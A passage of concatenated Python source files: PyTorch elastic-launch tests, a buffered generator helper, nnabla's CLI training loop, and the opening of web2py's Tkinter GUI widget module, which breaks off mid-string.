self._test_nproc_launch_configuration("auto", os.cpu_count())
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_nproc_launch_number_configurations(self):
self._test_nproc_launch_configuration("4", 4)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_nproc_launch_unknown_configurations(self):
with self.assertRaises(ValueError):
self._test_nproc_launch_configuration("unknown", 4)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
@patch("torch.cuda.is_available", return_value=True)
@patch("torch.cuda.device_count", return_value=3)
def test_nproc_gpu_launch_configurations(self, _mock1, _mock2):
self._test_nproc_launch_configuration("auto", 3)
self._test_nproc_launch_configuration("gpu", 3)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_elastic(self):
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
# we are only launching 1 node (even though max = 2)
world_size = nproc_per_node
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@mock.patch("torch.distributed.elastic.events.record")
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_elastic_worker_raise_exception(self, record_mock):
"""
        Asserts that when the worker program fails, the launcher raises an
        exception to indicate that the worker process failed
"""
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--max_restarts=0",
"--start_method=spawn",
path("bin/test_script.py"),
"--fail",
]
with self.assertRaises(ChildFailedError):
launch.main(args)
record_mock.assert_called_once()
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
@mock.patch(
"torch.distributed.elastic.agent.server.local_elastic_agent.LocalElasticAgent.run"
)
@mock.patch("torch.distributed.elastic.events.record")
def test_launch_elastic_agent_raise_exception(self, record_mock, mock_agent_run):
"""
Asserts that when the agent raises an exception
the launcher re-raises the original exception
"""
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--max_restarts=0",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
mock_agent_run.side_effect = MockException
with self.assertRaises(MockException):
launch.main(args)
record_mock.assert_called_once()
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_standalone(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--standalone",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_run_path(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
"--run_path",
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_elastic_multiple_agents(self):
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
nnodes = 2
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
procs = []
for _ in range(nnodes - 1):
p = mp.Process(target=launch.main, args=[args])
procs.append(p)
p.start()
launch.main(args)
for i in range(nnodes - 1):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def test_min_max_nodes_parse(self):
min_nodes, max_nodes = launch.parse_min_max_nnodes("1")
        self.assertEqual(min_nodes, max_nodes)
        self.assertEqual(1, min_nodes)
        min_nodes, max_nodes = launch.parse_min_max_nnodes("2:20")
        self.assertEqual(2, min_nodes)
        self.assertEqual(20, max_nodes)
with self.assertRaises(RuntimeError):
launch.parse_min_max_nnodes("2:20:30")
@patch("torch.distributed.launcher.api.LocalElasticAgent")
def test_launch_shutdown(self, agent_mock_cls):
nnodes = 1
nproc_per_node = 4
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
agent_mock = Mock()
agent_mock.run.return_value = RunResult(WorkerState.SUCCEEDED)
agent_mock_cls.return_value = agent_mock
rdzv_handler_mock = Mock()
with patch(
"torch.distributed.elastic.rendezvous.registry.get_rendezvous_handler"
) as param_mock:
param_mock.return_value = rdzv_handler_mock
launch.main(args)
rdzv_handler_mock.shutdown.assert_called_once()
|
buffering.py
|
import multiprocessing as mp
import Queue
import threading
def buffered_gen_mp(source_gen, buffer_size=2):
"""
Generator that runs a slow source generator in a separate process.
buffer_size: the maximal number of items to pre-generate (length of the buffer)
"""
if buffer_size < 2:
raise RuntimeError("Minimal buffer size is 2!")
buffer = mp.Queue(maxsize=buffer_size - 1)
# the effective buffer size is one less, because the generation process
# will generate one extra element and block until there is room in the buffer.
def _buffered_generation_process(source_gen, buffer):
for data in source_gen:
buffer.put(data, block=True)
buffer.put(None) # sentinel: signal the end of the iterator
buffer.close() # unfortunately this does not suffice as a signal: if buffer.get()
# was called and subsequently the buffer is closed, it will block forever.
process = mp.Process(target=_buffered_generation_process, args=(source_gen, buffer))
process.start()
for data in iter(buffer.get, None):
yield data
def buffered_gen_threaded(source_gen, buffer_size=2):
"""
Generator that runs a slow source generator in a separate thread. Beware of the GIL!
buffer_size: the maximal number of items to pre-generate (length of the buffer)
"""
if buffer_size < 2:
raise RuntimeError("Minimal buffer size is 2!")
buffer = Queue.Queue(maxsize=buffer_size - 1)
# the effective buffer size is one less, because the generation process
# will generate one extra element and block until there is room in the buffer.
def _buffered_generation_thread(source_gen, buffer):
for data in source_gen:
buffer.put(data, block=True)
buffer.put(None) # sentinel: signal the end of the iterator
thread = threading.Thread(target=_buffered_generation_thread, args=(source_gen, buffer))
thread.daemon = True
thread.start()
for data in iter(buffer.get, None):
yield data
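
# A minimal usage sketch (the slow generator below is hypothetical and not part
# of the original module). Running this file directly shows items being
# pre-fetched in a background thread while the consumer works.
if __name__ == "__main__":
    import time

    def slow_source():
        for i in range(5):
            time.sleep(0.2)  # pretend each item is expensive to produce
            yield i

    for item in buffered_gen_threaded(slow_source(), buffer_size=3):
        print(item)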
|
train.py
|
# Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from six.moves import range
from collections import OrderedDict
from contextlib2 import ExitStack # Backport from python3
import glob
import numpy as np
import os
import time
import zipfile
import nnabla as nn
from nnabla.logger import logger
from nnabla import available_contexts
from nnabla.parameter import save_parameters
from nnabla.utils.progress import configure_progress, progress
import nnabla.utils.callback as callback
from nnabla.utils.cli.utility import let_data_to_variable
from nnabla.utils.nnp_format import nnp_version
from nnabla.utils.communicator_util import current_communicator, single_or_rankzero
import nnabla.utils.load as load
_save_parameter_info = {}
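# _all_reduce below wraps comm.all_reduce with a watchdog thread: the watchdog
# polls a flag every 10 ms, and if the collective has not finished after about
# 10000 polls (~100 seconds) it assumes this rank has stalled and kills the
# process so the whole MPI job does not hang indefinitely.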
def _all_reduce(comm, var, division, inplace):
import threading
_finish = False
def _wait():
import time
count = 0
while not _finish:
if count > 10000:
logger.log(99, "STALLED MPI RANK {}".format(comm.rank))
os.kill(os.getpid(), 9)
time.sleep(0.01)
count += 1
th = threading.Thread(target=_wait)
th.start()
comm.all_reduce(var, division=division, inplace=inplace)
_finish = True
th.join()
def _save_parameters(args, suffix, epoch, force=False):
global _save_parameter_info
if suffix not in _save_parameter_info:
_save_parameter_info[suffix] = {}
_save_parameter_info[suffix]['epoch'] = 0
_save_parameter_info[suffix]['time'] = 0
current_time = time.time()
timediff = current_time - _save_parameter_info[suffix]['time']
epochdiff = epoch - _save_parameter_info[suffix]['epoch']
globname = os.path.join(args.outdir, 'results_{}_*.nnp'.format(suffix))
exists = glob.glob(globname)
base = os.path.join(args.outdir, 'results_{}_{}'.format(suffix, epoch))
base_candidate = callback.result_base(base, suffix, args.outdir)
if base_candidate is None:
if suffix is None or suffix == 'best':
base = os.path.join(args.outdir, 'results')
else:
base = base_candidate
filename = base + '.nnp'
if force or (not os.path.exists(filename) and (timediff > 180.0 or epochdiff > 10)):
# Remove existing nnp before saving new file.
for exist in exists:
os.unlink(exist)
version_filename = base + '_version.txt'
with open(version_filename, 'w') as file:
file.write('{}\n'.format(nnp_version()))
param_filename = base + '_param.protobuf'
save_parameters(param_filename)
with zipfile.ZipFile(filename, 'w') as nnp:
nnp.write(version_filename, 'nnp_version.txt')
nnp.write(_save_parameter_info['config'], os.path.basename(
_save_parameter_info['config']))
nnp.write(param_filename, 'parameter.protobuf')
os.unlink(version_filename)
os.unlink(param_filename)
_save_parameter_info[suffix]['epoch'] = epoch
_save_parameter_info[suffix]['time'] = current_time
callback.save_train_snapshot()
def _update(iter, config, cost):
comm = current_communicator()
loaded_data = {}
is_first_optimizer = True
def _sum_cost():
if comm:
# logger.log(99, "Calc cost with communicator")
var = [nn.NdArray()]
var[0].data = cost.sum_iteration
_all_reduce(comm, var, division=False, inplace=True)
cost.sum_epoch += var[0].data
cost.num_iteration += comm.size
else:
cost.sum_epoch += cost.sum_iteration
cost.num_iteration += 1
def _get_reserved_variable(shape, reserved_variable_name, iter, iter_per_epoch, max_epoch):
if reserved_variable_name == "%iter":
value = iter
elif reserved_variable_name == "%max_iter":
value = max_epoch * iter_per_epoch
elif reserved_variable_name == "%epoch":
value = iter // iter_per_epoch
elif reserved_variable_name == "%epochf":
value = iter * 1.0 / iter_per_epoch
elif reserved_variable_name == "%max_epoch":
value = max_epoch
elif reserved_variable_name == "%progress":
value = (iter * 1.0 / iter_per_epoch) / max_epoch
else:
raise ValueError("Unknown reserved variable {}".format(
reserved_variable_name))
return value
for opt in config.optimizers.values():
o = opt.optimizer
if (o.start_iter == 0 or iter + 1 >= o.start_iter) and (o.end_iter == 0 or iter + 1 <= o.end_iter):
# Load dataset
data = OrderedDict()
for di in opt.data_iterators:
if di not in loaded_data:
loaded_data[di] = di.next()
data.update(zip(di.variables, loaded_data[di]))
for v, d in o.dataset_assign.items():
dest_context = config.global_config.default_context if not o.forward_sequence or v not in o.forward_sequence[
0].inputs else None
if d not in data and d[0] == "%":
value = _get_reserved_variable(
v.variable_instance.shape, d, iter, config.training_config.iter_per_epoch, config.training_config.max_epoch)
v.variable_instance.data.fill(value)
elif d in data:
let_data_to_variable(v.variable_instance, data[
d], ctx=dest_context,
data_name=d, variable_name=v.name)
else:
raise ValueError('Variable "{}" is not found in dataset "{}", optimizer "{}"'.format(
d, ', '.join(o.data_iterators.keys()), o.name))
# Generate data
for v, generator in o.generator_assign.items():
dest_context = config.global_config.default_context if not o.forward_sequence or v not in o.forward_sequence[
0].inputs else None
let_data_to_variable(v.variable_instance,
data=generator(v.shape), ctx=dest_context,
variable_name=v.name)
# Monitor loss before forward to prepare input data while processing on
# GPU
if cost.variables:
for l in cost.variables:
cost.sum_iteration += np.mean(l.variable_instance.d)
# l.variable_instance.data.zero()
if is_first_optimizer:
is_first_optimizer = False
_sum_cost()
if single_or_rankzero():
progress("Training : cost={0:0.6f}".format(cost.sum_iteration),
(iter % config.training_config.iter_per_epoch) * 1.0 / config.training_config.iter_per_epoch)
cost.sum_iteration = 0.0
# Forward
o.network.forward(o.forward_sequence)
# Backward
o.network.backward(o.backward_sequence, iter %
o.update_interval == 0)
# Update
if iter % o.update_interval == o.update_interval - 1:
if o.weight_decay > 0:
o.solver.weight_decay(o.weight_decay)
if o.comm: # Updated param with communicator
params = [x.grad for x in o.parameters.values()]
_all_reduce(o.comm, params, division=True, inplace=True)
if o.scheduler is not None:
o.solver.set_learning_rate(
o.scheduler.get_learning_rate(iter))
o.solver.update()
            # Synchronize weights (parameters) across workers occasionally
if iter % 10 == 9: # TODO: change the interval
if o.comm:
params = [x.data for x in o.parameters.values()]
_all_reduce(o.comm, params, division=True, inplace=True)
# Reserve monitor loss
cost.variables = o.loss_variables
# Monitor loss at the end of epoch
if iter % config.training_config.iter_per_epoch == config.training_config.iter_per_epoch - 1 and cost.variables:
for l in cost.variables:
cost.sum_iteration += np.mean(l.variable_instance.d)
# l.variable_instance.data.zero()
_sum_cost()
cost.variables = None
cost.sum_iteration = 0.0
return cost
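# _evaluate runs every monitor over its full dataset (data_size // batch_size
# iterations), accumulates the mean of each monitor variable, and reports the
# averaged error. When save_best is enabled (or no best error exists yet) the
# "best" snapshot is written via _save_parameters. It returns the possibly
# updated best error together with a human-readable error summary string.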
def _evaluate(args, config, monitoring_report, best_error, epoch):
comm = current_communicator()
error_str = ''
valid_error = 0.0
def _sum_error(sum, error):
ret = None
if comm:
# logger.log(99, "Calc error with communicator")
var = [nn.NdArray()]
var[0].data = error
_all_reduce(comm, var, division=False, inplace=True)
ret = sum + var[0].data
else:
ret = sum + error
return ret
for name, mon in config.monitors.items():
m = mon.monitor
error_sum_monitor = 0.0
error_count = 0
data_size = max([di.size for di in mon.data_iterators])
batch_size = max([di.batch_size for di in mon.data_iterators])
for i in range(data_size // batch_size):
# Load dataset
data = OrderedDict()
for di in mon.data_iterators:
data.update(zip(di.variables, di.next()))
# Set data to variable
for v, d in m.dataset_assign.items():
dest_context = config.global_config.default_context if not m.forward_sequence or v not in m.forward_sequence[
0].inputs else None
let_data_to_variable(v.variable_instance, data[
d], ctx=dest_context,
data_name=d, variable_name=v.name)
# Generate data
for v, generator in m.generator_assign.items():
dest_context = config.global_config.default_context if not m.forward_sequence or v not in m.forward_sequence[
0].inputs else None
let_data_to_variable(v.variable_instance,
data=generator(v.shape), ctx=dest_context,
variable_name=v.name)
# Sum error before forward to prepare input data while processing
# on GPU
if error_count > 0:
error_sum = 0.0
for v in m.monitor_variables:
error_sum += np.mean(v.variable_instance.d)
# v.variable_instance.data.zero()
error_sum_monitor = _sum_error(error_sum_monitor, error_sum)
if single_or_rankzero():
progress('Evaluating "{0}"'.format(
name) + ' : error={0:0.6f}'.format(
error_sum_monitor / error_count),
di.position * 1.0 / di.size)
error_count += comm.size if comm else 1
# Forward recursive
m.network.forward(m.forward_sequence)
# Sum error at the end of dataset
error_sum = 0.0
for v in m.monitor_variables:
error_sum += np.mean(v.variable_instance.d)
# v.variable_instance.data.zero()
error_sum_monitor = _sum_error(error_sum_monitor, error_sum)
if error_count == 0:
error = 0
else:
error = error_sum_monitor / error_count
if np.isnan(error) or np.isinf(error):
logger.log(99, 'Validation error is Nan')
error = 0.0
monitoring_report.append(' {}: {}\n'.format(name, error))
callback.update_status((['monitoring_report', epoch, name], error))
callback.update_status((['last', name], error)) # save last value
if error_str != '':
error_str += ', '
else:
error_str = ' {'
error_str += '{}={:.6f}'.format(name, error)
if name == 'valid_error':
valid_error = error
if error_str != '':
error_str += '}'
# Save Parameters
if single_or_rankzero():
if (not config.training_config.save_best) or \
(not best_error) or \
(best_error is not None and valid_error <= best_error):
best_error = valid_error
callback.update_status(('best.valid_error', best_error))
callback.update_status(('best.epoch', epoch))
_save_parameters(args, 'best', epoch, True)
return best_error, error_str
def _get_current_parameter(args):
best_error, best_epoch = callback.get_best_from_status(args)
globname = os.path.join(args.outdir, 'results_current_*.nnp')
exists = glob.glob(globname)
if len(exists) > 0:
ex_list = {}
for ex in exists:
n = int(ex.rsplit('_', 1)[1].rsplit('.', 1)[0])
ex_list[n] = ex
last_epoch = sorted(ex_list.keys(), reverse=True)[0]
last_parameter = ex_list[last_epoch]
logger.log(99, "Load parameter from [{}]".format(
os.path.basename(last_parameter)))
load.load([last_parameter], parameter_only=True)
return last_epoch, best_epoch, best_error
return 0, best_epoch, best_error
def _calc_estimate_time(timeinfo, max_iter, last_iter, iter):
timeinfo.past_time = time.time() - timeinfo.start_time
timeinfo.estimate_time = timeinfo.past_time * \
(max_iter - last_iter) / (iter - last_iter)
timeinfo.remain_time = timeinfo.estimate_time - timeinfo.past_time
timeinfo.last_past_time = timeinfo.past_time
return timeinfo
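# A quick sanity check of the estimate above (values are illustrative only):
# with max_iter=1000, last_iter=0 and 100 iterations done in 50s,
# estimate_time = 50 * (1000 - 0) / (100 - 0) = 500s and remain_time = 450s,
# i.e. total time is extrapolated linearly from the progress made so far.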
def _train(args, config):
global _save_parameter_info
comm = current_communicator()
best_epoch = None
best_error = None
last_epoch = 0
if args.resume:
last_epoch, best_epoch, best_error = _get_current_parameter(args)
if best_epoch is not None:
logger.log(
99, "Best error {} recorded at epoch {} in previous training.".format(best_error,
best_epoch))
if best_epoch > last_epoch:
logger.log(
99, "Resumed epoch is {} but this training keep this result.".format(last_epoch))
logger.log(99, "Resume from epoch {}".format(last_epoch + 1))
callback.update_status(('epoch.max', config.training_config.max_epoch))
callback.update_status(('epoch.current', last_epoch + 1
if last_epoch < config.training_config.max_epoch
else config.training_config.max_epoch))
max_iteration = config.training_config.max_epoch * \
config.training_config.iter_per_epoch
if single_or_rankzero():
logger.log(99, 'Training epoch {} of {} begin'.format(last_epoch + 1,
config.training_config.max_epoch))
class Cost:
pass
cost = Cost()
cost.sum_epoch = 0.0
cost.num_iteration = 0
cost.sum_iteration = 0.0
cost.variables = None
class TimeInfo:
pass
timeinfo = TimeInfo()
timeinfo.past_time = 0
timeinfo.estimate_time = 0
timeinfo.last_past_time = None
if max_iteration > 0:
last_iteration = last_epoch * config.training_config.iter_per_epoch
if last_iteration < max_iteration:
timeinfo.start_time = time.time()
callback.update_status('processing', True, timeinfo.start_time)
for iteration in range(last_iteration, max_iteration):
cost = _update(iteration, config, cost)
if np.isnan(cost.sum_epoch) or np.isinf(cost.sum_epoch):
logger.log(99, 'Cost is Nan')
return False, False
timeinfo = _calc_estimate_time(
timeinfo, max_iteration, last_iteration, iteration + 1)
callback.update_time_train(prediction=timeinfo.estimate_time)
if config.timelimit > 0 and timeinfo.estimate_time > config.timelimit:
logger.log(99, 'Expected training time ({:.3f}s) will exceed time limit ({}s).'.format(
timeinfo.estimate_time, config.timelimit))
return False, False
if (iteration + 1) % config.training_config.iter_per_epoch == 0:
                    timeinfo.last_past_time = -1
# End of epoch
epoch = iteration // config.training_config.iter_per_epoch + 1
cost_avg_epoch = cost.sum_epoch / cost.num_iteration if cost.num_iteration else 0
cost.sum_epoch = 0.0
cost.num_iteration = 0
monitoring_report = []
# Evaluation
error_str = ''
if epoch % config.training_config.monitor_interval == 0 or epoch <= 5:
best_error, error_str = _evaluate(
args, config, monitoring_report, best_error, epoch)
if single_or_rankzero():
# Write to monitoring_report.yml
f = open(os.path.join(
args.outdir, 'monitoring_report.yml'), 'a')
f.write('{}:\n'.format(epoch - 1))
f.write(' cost: {}\n'.format(cost_avg_epoch))
for s in monitoring_report:
f.write(s)
f.close()
callback.update_status((['monitoring_report', epoch, 'cost'],
cost_avg_epoch))
_save_parameters(args, 'current', epoch)
callback.update_status(('epoch.current', epoch))
callback.update_status()
logger.log(99, 'epoch {} of {} cost={:.6f} {} time=({:.1f}s /{:.1f}s)'.format(
epoch, config.training_config.max_epoch, cost_avg_epoch, error_str,
timeinfo.past_time, timeinfo.estimate_time))
if callback.check_training_time(args, config, timeinfo, epoch, last_epoch) == False:
_save_parameters(args, 'current', epoch, True)
return False, True
if single_or_rankzero():
_save_parameters(args, 'current', epoch, True)
return True, False
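# train_command is the entry point for the "train" subcommand: it loads the
# .nntxt/.nnp configuration, builds per-optimizer and per-monitor configs,
# creates each data iterator exactly once (slicing it across ranks when a
# communicator is present), and then delegates the epoch loop to _train.
# With max_iteration == 0 it simply saves the initial parameters.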
def train_command(args):
callback.update_status(args)
if single_or_rankzero():
configure_progress(os.path.join(args.outdir, 'progress.txt'))
info = load.load([args.config], prepare_data_iterator=None,
exclude_parameter=True)
# Check dataset uri is empty.
dataset_error = False
for dataset in info.datasets.values():
if dataset.uri.strip() == '':
dataset_error = True
if dataset_error:
logger.log(99, 'Fatal error. Dataset URI is empty.')
return False
class TrainConfig:
pass
config = TrainConfig()
config.timelimit = -1
if args.param:
load.load([args.param], parameter_only=True)
config.timelimit = callback.get_timelimit(args)
config.global_config = info.global_config
config.training_config = info.training_config
if single_or_rankzero():
logger.log(99, 'Train with contexts {}'.format(available_contexts))
class OptConfig:
pass
config.optimizers = OrderedDict()
for name, opt in info.optimizers.items():
o = OptConfig()
o.optimizer = opt
o.data_iterators = []
config.optimizers[name] = o
class MonConfig:
pass
config.monitors = OrderedDict()
for name, mon in info.monitors.items():
m = MonConfig()
m.monitor = mon
m.data_iterators = []
config.monitors[name] = m
# Training
comm = current_communicator()
config.training_config.iter_per_epoch //= comm.size if comm else 1
max_iteration = config.training_config.max_epoch * \
config.training_config.iter_per_epoch
global _save_parameter_info
_save_parameter_info = {}
_, config_ext = os.path.splitext(args.config)
if config_ext == '.prototxt' or config_ext == '.nntxt':
_save_parameter_info['config'] = args.config
elif config_ext == '.nnp':
with zipfile.ZipFile(args.config, 'r') as nnp:
for name in nnp.namelist():
_, ext = os.path.splitext(name)
if ext == '.nntxt' or ext == '.prototxt':
nnp.extract(name, args.outdir)
_save_parameter_info['config'] = os.path.join(
args.outdir, name)
result = False
restart = False
if max_iteration > 0:
data_iterators = {'optimizer': {}, 'monitor': {}}
rng = np.random.RandomState(comm.rank if comm else 0)
with ExitStack() as stack:
# Create data_iterator instance only once for each dataset in optimizers
optimizer_data_iterators = {}
for name, o in config.optimizers.items():
for di in o.optimizer.data_iterators.values():
if di not in optimizer_data_iterators:
di_instance = stack.enter_context(di())
if comm and comm.size > 1:
di_instance = di_instance.slice(
rng, comm.size, comm.rank)
optimizer_data_iterators[di] = di_instance
else:
di_instance = optimizer_data_iterators[di]
o.data_iterators.append(di_instance)
# Create data_iterator instance only once for each dataset in monitors
monitor_data_iterators = {}
for name, m in config.monitors.items():
for di in m.monitor.data_iterators.values():
if di not in monitor_data_iterators:
di_instance = stack.enter_context(di())
if comm and comm.size > 1:
di_instance = di_instance.slice(
rng, comm.size, comm.rank)
monitor_data_iterators[di] = di_instance
else:
di_instance = monitor_data_iterators[di]
                    m.data_iterators.append(di_instance)
monitor_data_iterators.update(optimizer_data_iterators)
result, restart = _train(args, config)
else:
# save parameters without training (0 epoch learning)
logger.log(99, '0 epoch learning. (Just save parameter.)')
if single_or_rankzero():
_save_parameters(args, None, 0, True)
result = True
if single_or_rankzero() and not restart:
if result:
logger.log(99, 'Training Completed.')
callback.update_status('finished')
else:
            logger.log(99, 'Training Incomplete.')
callback.update_status('failed')
if single_or_rankzero():
progress(None)
return True
def add_train_command(subparsers):
# Train
subparser = subparsers.add_parser('train', help='Training with NNP.')
subparser.add_argument(
'-r', '--resume', help='resume from last saved parameter.', action='store_true')
subparser.add_argument(
'-c', '--config', help='path to nntxt', required=True)
subparser.add_argument(
'-p', '--param', help='path to parameter file', required=False)
subparser.add_argument(
'-o', '--outdir', help='output directory', required=True)
callback.add_train_command_arg(subparser)
subparser.set_defaults(func=train_command)
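# Usage sketch, assuming this module is wired up as the "train" subcommand of a
# CLI front end such as nnabla_cli (file names below are placeholders):
#
#     nnabla_cli train -c net.nntxt -o results/
#     nnabla_cli train -c net.nntxt -p pretrained_params.h5 -o results/ -r
#
# "-r" resumes from the newest results_current_*.nnp found in the output directory.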
|
widget.py
|
# -*- coding: utf-8 -*-
"""
| This file is part of the web2py Web Framework
| Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
GUI widget and services start function
--------------------------------------
"""
from __future__ import print_function
import sys
from gluon._compat import thread, xrange, PY2
import time
import threading
import os
import socket
import signal
import math
import logging
import getpass
from gluon import main, newcron
from gluon.fileutils import read_file, create_welcome_w2p
from gluon.console import console
from gluon.settings import global_settings
from gluon.shell import die, run, test
from gluon.utils import is_valid_ip_address, is_loopback_ip_address, getipaddrinfo
ProgramName = 'web2py Web Framework'
ProgramAuthor = 'Created by Massimo Di Pierro, Copyright 2007-' + str(
time.localtime().tm_year)
ProgramVersion = read_file('VERSION').rstrip()
if sys.version_info < (2, 7) or (3, 0) < sys.version_info < (3, 5):
from platform import python_version
sys.stderr.write("Warning: web2py requires at least Python 2.7/3.5"
" but you are running %s\n" % python_version())
def run_system_tests(options):
"""
Runs unittests for gluon.tests
"""
# see "python -m unittest -h" for unittest options help
# NOTE: someone might be interested either in using the
# -f (--failfast) option to stop testing on first failure, or
# in customizing the test selection, for example to run only
# 'gluon.tests.<module>', 'gluon.tests.<module>.<class>' (this
# could be shortened as 'gluon.tests.<class>'), or even
# 'gluon.tests.<module>.<class>.<method>' (or
# the shorter 'gluon.tests.<class>.<method>')
call_args = ['-m', 'unittest', '-c', 'gluon.tests']
if options.verbose:
call_args.insert(-1, '-v')
if options.with_coverage:
try:
import coverage
except:
die('Coverage not installed')
if not PY2:
sys.stderr.write('Experimental ')
sys.stderr.write("Python %s\n" % sys.version)
if options.with_coverage:
coverage_exec = 'coverage2' if PY2 else 'coverage3'
coverage_config_file = os.path.join('gluon', 'tests', 'coverage.ini')
coverage_config = os.environ.setdefault("COVERAGE_PROCESS_START",
coverage_config_file)
run_args = [coverage_exec, 'run', '--rcfile=%s' % coverage_config]
# replace the current process
os.execvpe(run_args[0], run_args + call_args, os.environ)
else:
run_args = [sys.executable]
# replace the current process
os.execv(run_args[0], run_args + call_args)
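# For example, on Python 3 with options.with_coverage set, the current process
# is replaced by something equivalent to
#     coverage3 run --rcfile=gluon/tests/coverage.ini -m unittest -c gluon.tests
# while without coverage it re-executes sys.executable with the same unittest args.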
def get_url(host, path='/', proto='http', port=80):
if ':' in host:
host = '[%s]' % host
elif host == '0.0.0.0':
host = '127.0.0.1'
if path.startswith('/'):
path = path[1:]
if proto.endswith(':'):
proto = proto[:-1]
if not port or port == 80:
port = ''
else:
port = ':%s' % port
return '%s://%s%s/%s' % (proto, host, port, path)
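# e.g. get_url('0.0.0.0', port=8000)            -> 'http://127.0.0.1:8000/'
#      get_url('::1', proto='https', port=8443) -> 'https://[::1]:8443/'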
def start_browser(url, startup=False):
if startup:
print('please visit:')
print('\t' + url)
print('starting browser...')
try:
import webbrowser
webbrowser.open(url)
except:
print('warning: unable to detect your browser')
class web2pyDialog(object):
""" Main window dialog """
def __init__(self, root, options):
""" web2pyDialog constructor """
if PY2:
import Tkinter as tkinter
import tkMessageBox as messagebox
else:
import tkinter
from tkinter import messagebox
bg_color = 'white'
root.withdraw()
self.root = tkinter.Toplevel(root, bg=bg_color)
self.root.resizable(0, 0)
self.root.title(ProgramName)
self.options = options
self.scheduler_processes = {}
self.menu = tkinter.Menu(self.root)
servermenu = tkinter.Menu(self.menu, tearoff=0)
httplog = os.path.join(self.options.folder, self.options.log_filename)
iconphoto = os.path.join('extras', 'icons', 'web2py.gif')
if os.path.exists(iconphoto):
img = tkinter.PhotoImage(file=iconphoto)
self.root.tk.call('wm', 'iconphoto', self.root._w, img)
# Building the Menu
item = lambda: start_browser(httplog)
servermenu.add_command(label='View httpserver.log',
command=item)
servermenu.add_command(label='Quit (pid:%i)' % os.getpid(),
command=self.quit)
self.menu.add_cascade(label='Server', menu=servermenu)
self.pagesmenu = tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Pages', menu=self.pagesmenu)
#scheduler menu
self.schedmenu = tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Scheduler', menu=self.schedmenu)
#start and register schedulers from options
self.update_schedulers(start=True)
helpmenu = tkinter.Menu(self.menu, tearoff=0)
# Home Page
item = lambda: start_browser('http://www.web2py.com/')
helpmenu.add_command(label='Home Page',
command=item)
# About
ProgramInfo = """%s
%s
